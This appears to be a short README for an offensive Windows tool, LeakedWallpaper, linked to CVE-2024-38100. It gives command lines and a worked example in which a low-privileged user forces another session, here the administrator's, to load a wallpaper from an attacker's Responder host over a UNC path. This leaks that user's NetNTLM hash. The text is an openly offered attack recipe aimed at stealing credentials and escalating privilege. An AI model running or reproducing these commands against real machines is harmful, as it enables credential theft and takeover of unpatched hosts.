This is a privilege escalation tool (fixed with CVE-2024-38100 in KB5040434) that allows us to leak a user's NetNTLM hash from any session on the computer, even if we are working from a low-privileged user.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgradeIf blocked, see demo.mkv
Imagine we have two sessions on the host:
- administrator is a privileged account, its NetNTLM hash is what we want to get
- exploit is a low-privileged account, we are working from it.
Current session id: 2
Target session id: 1
Responder IP: 172.16.0.5
Windows IP: 172.16.0.2
Let's get administrator NetNTLM-hash with the tool!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpgProfit!
